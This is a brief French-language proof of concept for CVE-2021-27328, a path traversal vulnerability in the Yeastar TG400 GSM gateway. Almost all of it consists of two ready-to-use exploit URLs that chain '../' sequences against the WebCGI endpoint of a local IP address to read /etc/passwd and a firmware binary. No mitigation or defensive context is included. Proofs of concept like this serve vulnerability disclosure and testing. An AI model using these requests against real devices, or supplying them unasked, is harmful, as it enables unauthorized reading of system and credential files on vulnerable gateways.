
Preuve de concept pour CVE-2021-27328, une vulnérabilité de traversée de chemin dans la passerelle GSM Yeastar TG400, démontrant une lecture arbitraire de fichier via une requête HTTP malveillante envoyée au point d'accès WebCGI.
Ceci est une preuve de concept pour CVE-2021-27328
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
